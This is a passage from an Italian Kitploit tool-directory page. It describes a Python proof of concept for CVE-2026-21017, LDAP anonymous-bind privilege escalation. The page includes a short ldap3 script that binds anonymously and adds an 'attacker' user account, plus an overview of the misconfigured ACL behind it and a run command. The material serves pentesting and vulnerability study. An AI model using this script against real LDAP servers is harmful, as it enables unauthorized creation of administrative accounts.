Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-21017-LDAP-Anonymous-Bind-Privilege-Escalation — Proof-of-concept in Python per l'escalation dei privilegi tramite bind anonimo LDAP, che simula ACL insicure per creare utenti amministrativi tramite bind LDAP non autenticati. | Kitploit
Strumenti/GitHubGitHub/george0papasotiriou/cve-2026-21017-ldap-anonymous-bind-privilege-escalation
Autenticazione e AutorizzazioneEscalation di PrivilegiAnalisi delle VulnerabilitàExploitPenetration TestingConfigurazione Errata
GitHubgeorge0papasotiriou/cve-2026-21017-ldap-anonymous-bind-privilege-escalation

CVE-2026-21017-LDAP-Anonymous-Bind-Privilege-Escalation

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Proof-of-concept in Python per l'escalation dei privilegi tramite bind anonimo LDAP, che simula ACL insicure per creare utenti amministrativi tramite bind LDAP non autenticati.

Vedi Repository
61 mese faNon ancora revisionato

CVE-2026-21017 – Elevazione dei privilegi tramite bind anonimo LDAP

Codice del programma (simulazione Python ldap3)

root@kitploit:~
# ldap_anon_sim.py - LDAP server allowing anonymous bind with write access
from ldap3 import Server, Connection, ALL

# Simulated: real server would be misconfigured
server = Server('ldap://localhost:389', get_info=ALL)
conn = Connection(server, authentication='ANONYMOUS')
conn.bind()
# If anonymous has write permission to userPassword, can add self as admin
conn.add('uid=attacker,ou=people,dc=example,dc=com', ['inetOrgPerson'], {'uid': 'attacker', 'userPassword': 'password'})
print("User created anonymously!")

CVE-2026-21017 – Elevazione dei privilegi tramite bind anonimo LDAP

Severity: Critical

Panoramica

Una directory LDAP è configurata in modo errato per consentire bind anonimi e concede anche accesso in scrittura ad attributi sensibili (come userPassword). Un attaccante può effettuare il bind in modalità anonima e creare un nuovo utente amministratore, elevando i privilegi.

Dettagli sulla vulnerabilità

  • Tipo: Controllo degli accessi insufficiente
  • Impatto: Compromissione completa della directory.
  • Causa principale: La lista di controllo degli accessi (ACL) non limita le scritture agli utenti autenticati.

Dimostrazione dello sfruttamento

Eseguire la simulazione (per un test reale è necessario un server LDAP effettivo, ma mostriamo il concetto):

root@kitploit:~
python ldap_anon_sim.py

Lo script tenta di aggiungere un utente in modalità anonima.

Scarica lo strumento